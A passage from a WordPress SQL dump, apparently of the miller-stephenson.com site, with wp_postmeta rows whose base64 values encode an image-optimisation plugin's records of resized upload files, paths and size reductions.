ZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFzeXMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ4NSwidGltZSI6MTQ4MzU5MDI5MiwiaWQiOjg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFzeXMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYXN5cy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhc3lzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1MzQsInRpbWUiOjE0ODM1OTAyOTYsImlkIjo4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhc3lzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFzeXMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYXN5cy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzEyLCJ0aW1lIjoxNDgzNTkwMjk5LCJpZCI6ODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYXN5cy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhc3lzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFzeXMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc1MSwidGltZSI6MTQ4MzU5MDMwMywiaWQiOjg3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFzeXMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYXN5cy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhc3lzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo3NjksInRpbWUiOjE0ODM1OTAzMDcsImlkIjo4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhc3lzLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFzeXMtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYXN5cy02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTI5NiwidGltZSI6MTQ4MzU5MDMxMSwiaWQiOjg3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30359, 86, 'wpfc_optimisation_reduction', '16878'); 
INSERT INTO `wp_postmeta` VALUES (30360, 86, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQuanBnIiwid2lkdGgiOjczNjAsImhlaWdodCI6NDkxMiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU5MDMxNiwiaWQiOiI4NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTksInRpbWUiOjE0ODM1OTAzMjAsImlkIjo4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTgwMHg1MzQuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtODAweDUzNC5qcGciLCJyZWR1Y3Rpb24iOjE4OTIsInRpbWUiOjE0ODM1OTAzMjQsImlkIjo4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjE5NDIsInRpbWUiOjE0ODM1OTAzMjgsImlkIjo4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MzczMiwidGltZSI6MTQ4MzU5MDMzNCwiaWQiOjg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NzA1LCJ0aW1lIjoxNDgzNTkwMzM3LCJpZCI6ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzMsInRpbWUiOjE0ODM1OTAzNDEsImlkIjo4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjY0NSwidGltZSI6MTQ4MzU5MDM0NCwiaWQiOjg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTQyNiwidGltZSI6MTQ4MzU5MDM0OCwiaWQiOjg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzgsInRpbWUiOjE0ODM1OTAzNTEsImlkIjo4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDg4LCJ0aW1lIjoxNDgzNTkwMzU1LCJpZCI6ODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcwNiwidGltZSI6MTQ4MzU5MDM1OSwiaWQiOjg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3NzcsInRpbWUiOjE0ODM1OTAzNjIsImlkIjo4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTEyMiwidGltZSI6MTQ4MzU5MDM2NiwiaWQiOjg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvcmVsZWFzZS1hZ2VudC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3JlbGVhc2UtYWdlbnQtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9yZWxlYXNlLWFnZW50LTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNTczLCJ0aW1lIjoxNDgzNTkwMzcwLCJpZCI6ODZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30361, 85, 'wpfc_optimisation_reduction', '2981'); 
INSERT INTO `wp_postmeta` VALUES (30362, 85, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS5qcGciLCJ3aWR0aCI6NDUwLCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLmpwZyIsInJlZHVjdGlvbiI6Mjk3MiwidGltZSI6MTQ4MzU5MDM3NywiaWQiOiI4NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMzQweDMyMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0zNDB4MzIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMzgwLCJpZCI6ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMzgyLCJpZCI6ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMzg0LCJpZCI6ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01FZGljYWwtMS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwMzg2LCJpZCI6ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTAzODgsImlkIjo4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01FZGljYWwtMS0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDM5MCwiaWQiOjg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTUVkaWNhbC0xLTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NRWRpY2FsLTEtMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtb